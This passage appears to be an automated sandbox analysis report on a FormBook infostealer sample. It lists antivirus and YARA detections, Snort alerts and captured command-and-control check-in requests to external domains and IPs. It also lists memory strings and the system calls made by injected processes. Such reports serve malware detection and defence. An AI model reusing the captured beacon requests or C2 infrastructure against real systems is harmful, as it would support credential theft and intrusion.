"0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121a0", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: bXFjrxjRlb.exe	Virustotal: Detection: 27%			Perma Link
Source: bXFjrxjRlb.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: bXFjrxjRlb.exe

Joe Sandbox ML: detected

Source: 1.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: bXFjrxjRlb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: bXFjrxjRlb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Binary contains paths to debug symbols

Show sources

Source:	Binary string: cscript.pdbUGP source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, cscript.exe
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000002.402103553.00000000009E2000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: cscript.pdb source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C6750
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_069C7490
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7490
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C8308
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov esp, ebp	0_2_069CDED8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then jmp 069C2766h	0_2_069C1F91
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_069C7484
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7484
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then xor edx, edx	0_2_069C73BC
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then xor edx, edx	0_2_069C73C8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C83E8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_069C7170
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7170
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_069C7164
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7164
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C6C8C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80

Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View	IP Address: 198.54.117.215 198.54.117.215

Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.what3emoji.com

Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bXFjrxjRlb.exe, 00000000.00000003.349237983.000000000802D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsofB
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bXFjrxjRlb.exe, 00000000.00000002.356197969.000000000254F000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: cscript.exe, 00000007.00000002.702464960.000000000518F000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehostingroad.com/cgi-sys/suspendedpage.cgi?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.comT

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419D70 NtCreateFile,	1_2_00419D70
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419E20 NtReadFile,	1_2_00419E20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419EA0 NtClose,	1_2_00419EA0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419F50 NtAllocateVirtualMemory,	1_2_00419F50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419E1A NtReadFile,	1_2_00419E1A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01379910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379540 NtReadFile,LdrInitializeThunk,	1_2_01379540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013799A0 NtCreateSection,LdrInitializeThunk,	1_2_013799A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013795D0 NtClose,LdrInitializeThunk,	1_2_013795D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01379860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379840 NtDelayExecution,LdrInitializeThunk,	1_2_01379840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_013798F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01379710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_013797A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01379780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A20 NtResumeThread,LdrInitializeThunk,	1_2_01379A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01379A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01379660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A50 NtCreateFile,LdrInitializeThunk,	1_2_01379A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_013796E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137AD30 NtSetContextThread,	1_2_0137AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379520 NtWaitForSingleObject,	1_2_01379520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379560 NtWriteFile,	1_2_01379560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379950 NtQueueApcThread,	1_2_01379950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013795F0 NtQueryInformationFile,	1_2_013795F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013799D0 NtCreateProcessEx,	1_2_013799D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379820 NtEnumerateKey,	1_2_01379820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137B040 NtSuspendThread,	1_2_0137B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013798A0 NtWriteVirtualMemory,	1_2_013798A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379730 NtQueryVirtualMemory,	1_2_01379730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A710 NtOpenProcessToken,	1_2_0137A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379B00 NtSetValueKey,	1_2_01379B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379770 NtSetInformationFile,	1_2_01379770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A770 NtOpenThread,	1_2_0137A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379760 NtOpenProcess,	1_2_01379760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137A3B0 NtGetContextThread,	1_2_0137A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379FE0 NtCreateMutant,	1_2_01379FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379610 NtEnumerateValueKey,	1_2_01379610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A10 NtQuerySection,	1_2_01379A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379670 NtQueryInformationProcess,	1_2_01379670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379650 NtQueryValueKey,	1_2_01379650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A80 NtOpenDirectoryObject,	1_2_01379A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013796D0 NtCreateKey,	1_2_013796D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk,	7_2_047D9540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk,	7_2_047D95D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_047D9660
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk,	7_2_047D9650
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_047D96E0
